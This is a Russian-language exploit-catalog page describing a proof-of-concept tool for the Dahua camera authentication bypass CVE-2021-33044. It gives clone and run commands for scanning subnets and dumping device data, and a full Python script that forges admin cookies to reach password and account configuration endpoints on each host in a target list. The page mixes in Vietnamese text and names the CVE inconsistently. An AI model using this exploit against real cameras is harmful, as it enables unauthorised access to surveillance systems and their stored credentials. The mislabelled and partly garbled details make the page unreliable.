Skip to content
KitploitKITPLOIT
ИнструментыЭксплойтыБлог
Log in
Отправить
ИнструментыЭксплойтыБлог
Отправить

Инструменты для хакинга, пентеста и кибербезопасности — ваш арсенал защиты!

Kitploit — это каталог инструментов для хакинга, кибербезопасности и пентестинга. Находите последние обновления проектов для поиска уязвимостей, анализа систем, автоматизации тестирования и усиления вашей безопасности.

ЛентыКонтактыКонфиденциальность© 2026 Kitploit

Каталог инструментов

Категории

Все категории
Loading categories
DAHUA_AUTH-BYPASS-CVE-2021-33044 — PoC-эксплойт для обхода аутентификации Dahua (CVE-2021-33044). Сканирует подсети, тестирует несколько CVE и извлекает конфигурации устройств через подделанные куки без действительных учетных данных. | Kitploit
Инструменты/GitHubGitHub/eagle-nett/dahua_auth-bypass-cve-2021-33044
Аутентификация и авторизацияБезопасность IoTАнализ уязвимостейЭксплуатацияЭксплуатация веб-приложенийТестирование на ПроникновениеОбучение и Образование
GitHub

Популярное

Смотреть все →

Откройте для себя самые используемые инструменты нашего сообщества.

Изучить все инструменты

Просмотрите нашу коллекцию инструментов

Смотреть все инструменты →
Поделиться
eagle-nett/dahua_auth-bypass-cve-2021-33044

DAHUA_AUTH-BYPASS-CVE-2021-33044

PoC-эксплойт для обхода аутентификации Dahua (CVE-2021-33044). Сканирует подсети, тестирует несколько CVE и извлекает конфигурации устройств через подделанные куки без действительных учетных данных.

Репозиторий
1255 месяцев назадЕщё не проверено

Симуляция эксплуатации Dahua Authentication Bypass PoC (CVE-2021-33044)

Обзор

IP-камеры Dahua — это IoT-устройства, широко используемые в системах видеонаблюдения. Поскольку они часто развертываются в локальных сетях или имеют доступ из Интернета, уязвимости в IP-камерах могут серьезно повлиять на конфиденциальность и безопасность информации.

CVE-2021-33045 — это уязвимость безопасности, существующая в некоторых моделях камер Dahua, позволяющая несанкционированный доступ к внутренним конфигурационным ресурсам без надлежащей аутентификации. Эта уязвимость связана с недостаточно строгим контролем доступа в прошивке устройства.

Информация об уязвимости

ПунктСодержание
CVECVE-2021-33044
ТипAuthentication Bypass
СтепеньCritical (CVSS ~9.8)
АутентификацияНе требуется
ВлияниеDahua Camera / DVR / NVR

Причина

Уязвимость возникает из-за небезопасной конструкции аутентификации в прошивке камер Dahua:

  • Сервер не проверяет корректно session/token
  • Доверяет данным, отправленным клиентом
  • Некоторые чувствительные конфигурационные endpoints проверяют только наличие cookie, не проверяя реальные права доступа

Это позволяет атакующему:

  • подделать процесс аутентификации
  • полностью обойти вход в систему

Ссылки:

  • NVD CVE-2021-33044
  • http://seclists.org/fulldisclosure/2021/Oct/13

Принцип работы механизма обхода аутентификации

Нормальный поток

→ Client gửi HTTP request kèm cookie tùy ý
→ Camera kiểm tra cookie ở mức giao diện
→ Không xác minh session hợp lệ ở backend
→ Cho phép truy cập trực tiếp vào các endpoint cấu hình nội bộ
→ Trả về dữ liệu nhạy cảm

Сценарии

ФайлНазначениеCVE
dahua_scanner.pyОбнаружение сети — поиск камер Dahua в подсетиОбнаружение
dahua_exploit.pyМного-CVE сканер — проверка всех уязвимостей.Все
dahua_auth_bypass.pyСпециализированный обход аутентификации с опцией --dumpCVE-2021-33044

Использование

Установка

# Clone repository
git clone https://github.com/eagle-nett/DAHUA_AUTH-BYPASS-CVE-2021-33044.git
cd DAHUA_AUTH-BYPASS-CVE-2021-33044

pip install requests

Сканирование сети

# Scan subnet (ports required)
python dahua_scanner.py https://example.com -p 80 8080 8800

# Single host with port
python dahua_scanner.py https://example.com

Стандартные порты Dahua: 80,443, 8080, 37777, 37778

Эксплуатация уязвимости CVE

python dahua_exploit.py https://example.com -p 8081
python dahua_exploit.py https://example.com -c 2021-33044  #CVE
python dahua_exploit.py --help

Обход аутентификации

python dahua_auth_bypass.py https://example.com -p 8080
python dahua_auth_bypass.py https://example.com  # Dump thiết bị sau khi bypass

Пример

#!/usr/bin/env python3
import requests, sys
requests.packages.urllib3.disable_warnings()

def dump_accounts(ip, port=80):
    base = f"http://{ip}:{port}"
    cookies = {
        "userName": "admin",
        "userLevel": "1",
        "sessionID": "00000000"
    }
    urls = [
        "/current_config/passwd",
        "/current_config/Account1",
        "/current_config/UserMgr",
        "/current_config/accounts"
    ]

    for path in urls:
        try:
            r = requests.get(
                base + path,
                cookies=cookies,
                verify=False,
                timeout=8
            )
            if r.status_code == 200 and len(r.text) > 30:
                print(f"[+] {ip}:{port}  VULNERABLE → {path}")
                return
        except:
            pass

    print(f"[-] {ip}:{port}  safe / patched")

for line in open("targets.txt"):
    t = line.strip()
    if not t or t.startswith("#"):
        continue
    ip = t.split(":")[0]
    port = int(t.split(":")[1]) if ":" in t else 80
    dump_accounts(ip, port)

Объяснение

  • Скрипт использует библиотеку requests и активно отключает предупреждения SSL для подавления предупреждений.

  • Функция dump_accounts(ip, port=80) является основной функцией, отвечающей за проверку одного устройства камеры. Основные функции функции:

    • Построить URL из IP-адреса и порта
    • Имитировать состояние входа администратора через cookie
    • Отправить запросы к чувствительным конфигурационным endpoint'ам
    • Проанализировать ответ, чтобы определить, уязвимо ли устройство
  • Имитация cookie аутентификации. Функция использует значения cookie, например:

    • userName=admin
    • userLevel=1
    • sessionID=00000000
  • В уязвимых версиях камер бэкенд не проверяет фактический sessionID, в результате чего система считает, что запрос отправлен от действительной учетной записи администратора.

Цикл обработки списка целей

Скрипт читает список целей из входного файла, последовательно вызывая функцию проверки для каждого устройства. Такой подход позволяет автоматически оценивать множество камер.

image

Процесс разработки

Эти скрипты разработаны на основе:

  • Детали CVE, опубликованные NVD
  • Уведомления безопасности от Dahua
  • Публичные PoC-ссылки (seclists.org, packetstormsecurity)

Статус тестирования:

  • Логика обхода аутентификации реализована в соответствии со спецификацией CVE
  • Ограниченное тестирование на уязвимых устройствах.

Примечание

Этот проект:

  • Только для учебных и исследовательских целей
  • Запускайте в своей лабораторной среде
Скачать инструмент